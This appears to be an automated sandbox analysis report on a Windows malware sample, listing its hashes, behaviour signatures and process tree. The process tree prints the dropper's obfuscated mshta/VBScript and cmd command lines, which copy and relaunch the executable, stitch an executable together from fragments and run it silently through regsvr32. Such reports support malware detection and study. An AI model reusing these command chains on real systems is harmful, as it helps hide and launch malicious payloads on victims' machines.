Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
-
submitted
19/03/2024, 12:39
General
-
Target
d6233c6193802ea1bdb6513178dee0d4.exe
-
Size
1.6MB
-
MD5
d6233c6193802ea1bdb6513178dee0d4
-
SHA1
8ee6a6c09f4b381c9950c6dc07b5fbff394c82f2
-
SHA256
fc9920b7b170b63cd3167b21cc2bff2c746351c6010d5d96dfc2b2e4bab8fe5c
-
SHA512
9cfa2be3c9bec03a13f864531af4e1d701cc13559d86b5ff8916f0ac825ab7c2d779f7fca39d290c86bd9dabe51992a35392c508e7b4592168e38375838efa76
-
SSDEEP
49152:N8rQmdYldsM0ve6Mx+FhgYF158BLYRbK8R:artK/0W6q+FatBkR9R
Score
7/10
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
-
Loads dropped DLL 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 1 IoCs
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 28 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\d6233c6193802ea1bdb6513178dee0d4.exe"C:\Users\Admin\AppData\Local\Temp\d6233c6193802ea1bdb6513178dee0d4.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscriPT: cloSe ( cReATEobJECt ( "wSCrIPT.shell" ). RUn ( "CMd /q /c Copy /Y ""C:\Users\Admin\AppData\Local\Temp\d6233c6193802ea1bdb6513178dee0d4.exe"" ..\H2B6ZYOWt9N1.exe && STArt ..\H2B6ZYOwT9N1.EXE /Pxr__DUmdZ810p1T & iF """" == """" for %k In (""C:\Users\Admin\AppData\Local\Temp\d6233c6193802ea1bdb6513178dee0d4.exe"" ) do taskkill -iM ""%~nXk"" -f " , 0 , tRue ) )2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c Copy /Y "C:\Users\Admin\AppData\Local\Temp\d6233c6193802ea1bdb6513178dee0d4.exe" ..\H2B6ZYOWt9N1.exe && STArt ..\H2B6ZYOwT9N1.EXE /Pxr__DUmdZ810p1T & iF "" == "" for %k In ("C:\Users\Admin\AppData\Local\Temp\d6233c6193802ea1bdb6513178dee0d4.exe" ) do taskkill -iM "%~nXk" -f3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\H2B6ZYOWt9N1.exe..\H2B6ZYOwT9N1.EXE /Pxr__DUmdZ810p1T4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscriPT: cloSe ( cReATEobJECt ( "wSCrIPT.shell" ). RUn ( "CMd /q /c Copy /Y ""C:\Users\Admin\AppData\Local\Temp\H2B6ZYOWt9N1.exe"" ..\H2B6ZYOWt9N1.exe && STArt ..\H2B6ZYOwT9N1.EXE /Pxr__DUmdZ810p1T & iF ""/Pxr__DUmdZ810p1T "" == """" for %k In (""C:\Users\Admin\AppData\Local\Temp\H2B6ZYOWt9N1.exe"" ) do taskkill -iM ""%~nXk"" -f " , 0 , tRue ) )5⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c Copy /Y "C:\Users\Admin\AppData\Local\Temp\H2B6ZYOWt9N1.exe" ..\H2B6ZYOWt9N1.exe && STArt ..\H2B6ZYOwT9N1.EXE /Pxr__DUmdZ810p1T & iF "/Pxr__DUmdZ810p1T " == "" for %k In ("C:\Users\Admin\AppData\Local\Temp\H2B6ZYOWt9N1.exe" ) do taskkill -iM "%~nXk" -f6⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRipt: cloSe( crEAteOBjecT ("wsCrIpT.SHElL" ). RUN ( "cMd.exE /c EchO C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\CWa> QMAYPJ4r.y9 & EchO | seT /P = ""MZ"" > F5Q7VM.QHS & cOpy /b /Y f5Q7Vm.QHS + 3Z66_5OA.W + aSg6.VV + S_6i~t.h6+ FFrXO.8u + TMSNJim6.J + i_tI18W.a + qMaypj4r.y9 ..\NOXj.P & DeL /q *& sTarT regsvr32 ..\NOXj.P /U /s " , 0 , TrUE ) )5⤵
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "d6233c6193802ea1bdb6513178dee0d4.exe" -f4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.6MB
MD5d6233c6193802ea1bdb6513178dee0d4
SHA18ee6a6c09f4b381c9950c6dc07b5fbff394c82f2
SHA256fc9920b7b170b63cd3167b21cc2bff2c746351c6010d5d96dfc2b2e4bab8fe5c
SHA5129cfa2be3c9bec03a13f864531af4e1d701cc13559d86b5ff8916f0ac825ab7c2d779f7fca39d290c86bd9dabe51992a35392c508e7b4592168e38375838efa76